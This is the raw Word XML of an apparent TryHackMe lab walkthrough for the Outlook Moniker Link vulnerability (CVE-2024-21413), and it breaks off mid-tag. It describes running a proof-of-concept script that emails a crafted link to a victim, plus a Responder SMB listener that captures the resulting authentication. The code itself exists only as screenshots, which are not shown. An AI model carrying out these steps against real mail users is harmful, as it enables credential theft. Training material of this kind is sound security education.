    <w:p w14:paraId="63DF92AB" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="166C7AEB" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="53DEF0D8" w14:textId="77777777" w:rsidR="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="308F41B4" w14:textId="77777777" w:rsidR="00304941" w:rsidRDefault="00304941" w:rsidP="00304941">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40CA01F9" w14:textId="77777777" w:rsidR="00304941" w:rsidRDefault="00304941" w:rsidP="00304941">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E839BAF" w14:textId="77777777" w:rsidR="00304941" w:rsidRDefault="00304941" w:rsidP="00304941">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157795A1" w14:textId="77777777" w:rsidR="00304941" w:rsidRDefault="00304941" w:rsidP="00304941">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5C69D4" w14:textId="77777777" w:rsidR="00304941" w:rsidRDefault="00304941" w:rsidP="00304941">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="386D57C8" w14:textId="77777777" w:rsidR="00A675FB" w:rsidRPr="00A675FB" w:rsidRDefault="00A675FB" w:rsidP="00A675FB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A675FB">
        <w:lastRenderedPageBreak/>
        <w:t>The PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CD669A" w14:textId="77777777" w:rsidR="00A675FB" w:rsidRPr="00A675FB" w:rsidRDefault="00A675FB" w:rsidP="00A675FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A675FB">
        <w:t>Takes an attacker &amp; victim email. Normally, you would need to use your own SMTP server (this has already been provided for you in this room)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E5FEB5" w14:textId="77777777" w:rsidR="00A675FB" w:rsidRPr="00A675FB" w:rsidRDefault="00A675FB" w:rsidP="00A675FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A675FB">
        <w:t>Requires the password to authenticate. For this room, the password for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A675FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attacker@monikerlink.thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A675FB">
        <w:t> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A675FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69693AA5" w14:textId="77777777" w:rsidR="00A675FB" w:rsidRPr="00A675FB" w:rsidRDefault="00A675FB" w:rsidP="00A675FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A675FB">
        <w:t>Contains the email content (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A675FB">
        <w:t>html_content</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A675FB">
        <w:t>), which contains our Moniker Link as a HTML hyperlink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FBC46E" w14:textId="77777777" w:rsidR="00A675FB" w:rsidRPr="00A675FB" w:rsidRDefault="00A675FB" w:rsidP="00A675FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A675FB">
        <w:t>Then, fill in the "subject", "from" and "to" fields in the email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AB666F" w14:textId="77777777" w:rsidR="00A675FB" w:rsidRPr="00A675FB" w:rsidRDefault="00A675FB" w:rsidP="00A675FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A675FB">
        <w:t>Finally, it sends the email to the mail server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F858C30" w14:textId="77777777" w:rsidR="00A675FB" w:rsidRPr="00A675FB" w:rsidRDefault="00A675FB" w:rsidP="00A675FB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A675FB">
        <w:t>Let’s use Responder to create an SMB listener on our attacking machine. For the THM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A675FB">
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A675FB">
        <w:t>, the interface will be -I ens5. The interface name will differ if you are using your own device (i.e. Kali). If you would like some homework, an Impacket server can also be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCB32AD" w14:textId="148AE22B" w:rsidR="00304941" w:rsidRDefault="00A33B66" w:rsidP="00304941">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A33B66">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1009E41B" wp14:editId="5ED01573">
            <wp:extent cx="5731510" cy="3125470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="71197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70980" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3125470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0072409B" w:rsidRPr="0072409B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0072409B" w:rsidRPr="0072409B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3938E087" wp14:editId="689F7D16">
            <wp:extent cx="5731510" cy="1267460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="28332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1416" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1267460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00EF41B0" w:rsidRPr="00EF41B0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF41B0" w:rsidRPr="00EF41B0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A034FD8" wp14:editId="5C9E9E25">
            <wp:extent cx="5731510" cy="3147060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="555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6560" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3147060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005F226A" w:rsidRPr="005F226A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F226A" w:rsidRPr="005F226A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D73CF42" wp14:editId="684340F3">
            <wp:extent cx="5731510" cy="3112135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="49986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6711" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3112135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00133E99" w:rsidRPr="00133E99">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00133E99" w:rsidRPr="00133E99">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02E0B024" wp14:editId="35CA5DBA">
            <wp:extent cx="5731510" cy="1130935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="151279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98555" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1130935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AAED7D" w14:textId="77777777" w:rsidR="00F92A6E" w:rsidRDefault="00F92A6E" w:rsidP="00304941">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Openoutlook</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92A6E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6956768E" w14:textId="78C82AD8" w:rsidR="00CC7436" w:rsidRDefault="00CC7436" w:rsidP="00304941">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BCB91A7" w14:textId="77777777" w:rsidR="009C4987" w:rsidRDefault="00CC7436" w:rsidP="00304941">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC7436">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Let's open the vulnerable machine by pressing the "CVE-2024-21413" pane in the split-screen view.  </w:t>
      </w:r>
      <w:r w:rsidR="00734497" w:rsidRPr="00F92A6E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2625D63D" wp14:editId="5A82981D">
            <wp:extent cx="5731510" cy="2623820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="17565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12288" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2623820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43327AF6" w14:textId="102CE328" w:rsidR="00563EAA" w:rsidRPr="00563EAA" w:rsidRDefault="009C4987" w:rsidP="00563EAA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4987">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59DE6FF8" wp14:editId="68978ABA">
            <wp:extent cx="5731510" cy="324485"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="505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7771" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="324485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00563EAA" w:rsidRPr="00563EAA">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00563EAA" w:rsidRPr="00563EAA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Open Outlook by clicking the "Outlook" shortcut on the desktop. When Outlook has opened, click "I don't want to sign in or create an account" on the popup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43720F60" w14:textId="43574EA4" w:rsidR="00733A10" w:rsidRPr="00733A10" w:rsidRDefault="002F6E39" w:rsidP="00733A10">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F6E39">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60870BB4" wp14:editId="7CC205A3">
            <wp:extent cx="5731510" cy="5347335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="161131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12346" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="5347335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00733A10" w:rsidRPr="00733A10">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro" w:cs="Times New Roman"/>
          <w:color w:val="151C2B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00733A10" w:rsidRPr="00733A10">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Dismiss the second popup by clicking on the "X" at the top right of the popup (you may need to drag the window to the left a little, depending on your screen resolution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731F69EE" w14:textId="295B299F" w:rsidR="00423191" w:rsidRDefault="00FC63B6" w:rsidP="00226E70">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EBA2E9E" wp14:editId="4EC5DE93">
            <wp:extent cx="5730240" cy="5105400"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="291127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5105400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00423191" w:rsidRPr="00423191">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00226E70" w:rsidRPr="00226E70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">When completed, you will see the Outlook interface. For this room, the victim's mailbox has already </w:t>
      </w:r>
      <w:r w:rsidR="00226E70" w:rsidRPr="00226E70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>been set up in Outlook for you.</w:t>
      </w:r>
      <w:r w:rsidR="00423191" w:rsidRPr="00423191">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20C0E322" wp14:editId="3C23F12F">
            <wp:extent cx="5731510" cy="5144135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="90904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49727" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="5144135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04901CFE" w14:textId="447A824A" w:rsidR="00D3730F" w:rsidRDefault="00D3730F" w:rsidP="00226E70">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3730F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AE53417" wp14:editId="3B910994">
            <wp:extent cx="5731510" cy="2605405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="50201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12391" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2605405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61762F46" w14:textId="421DE181" w:rsidR="006B2995" w:rsidRDefault="006B2995" w:rsidP="00226E70">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B2995">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Return to your AttackBox. We will copy and paste the PoC above onto the AttackBox.</w:t>
      </w:r>
      <w:r w:rsidR="00057216" w:rsidRPr="00057216">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00057216" w:rsidRPr="00057216">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0707CBE8" wp14:editId="71CE6D23">
            <wp:extent cx="5731510" cy="2032000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="66951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14674" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2032000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73575C4C" w14:textId="77777777" w:rsidR="00887639" w:rsidRDefault="00887639" w:rsidP="00226E70">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C07770" w14:textId="77777777" w:rsidR="00887639" w:rsidRPr="00887639" w:rsidRDefault="00887639" w:rsidP="00887639">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00887639">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>We will need to do some initial setup on Our AttackBox before running the Python script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB2A57B" w14:textId="77777777" w:rsidR="00887639" w:rsidRPr="00887639" w:rsidRDefault="00887639" w:rsidP="00887639">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00887639">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Modify the Moniker Link (line #12) in our PoC to reflect the IP address of our AttackBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13833675" w14:textId="4D95771C" w:rsidR="00887639" w:rsidRPr="00887639" w:rsidRDefault="00887639" w:rsidP="00887639">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00887639">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the MAILSERVER placeholder on line #31 with </w:t>
      </w:r>
      <w:r w:rsidR="009D69CF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>victim IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCCD7A9" w14:textId="77777777" w:rsidR="00887639" w:rsidRPr="00887639" w:rsidRDefault="00887639" w:rsidP="00887639">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00887639">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>When done, we can run the exploit. When prompted for the attacker's email password, enter "attacker".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CFC9CA" w14:textId="02880A8D" w:rsidR="00887639" w:rsidRDefault="008546CA" w:rsidP="00226E70">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008546CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B05E493" wp14:editId="0BAB07BD">
            <wp:extent cx="5731510" cy="3056890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="23037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71500" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3056890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="007F7367" w:rsidRPr="007F7367">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F7367" w:rsidRPr="007F7367">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04EA4DE7" wp14:editId="164B9A07">
            <wp:extent cx="5731510" cy="3070860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="65806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63380" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3070860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A24D27" w:rsidRPr="00A24D27">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A24D27" w:rsidRPr="00A24D27">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79C5E989" wp14:editId="04EE7CF9">
            <wp:extent cx="5731510" cy="1202055"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="54806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3950" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1202055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="724B672A" w14:textId="2E1A4D22" w:rsidR="00796A32" w:rsidRDefault="00796A32" w:rsidP="00226E70">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796A32">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>The Python script will print "Email delivered" when the email has been sent. If the script complains about authentication failure, ensure you have correctly replaced the values in exploit.py. Now, let's return to the vulnerable machine and check for the new email:</w:t>
      </w:r>
      <w:r w:rsidR="00E04C86">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02DBCDA7" wp14:editId="5F2B6923">
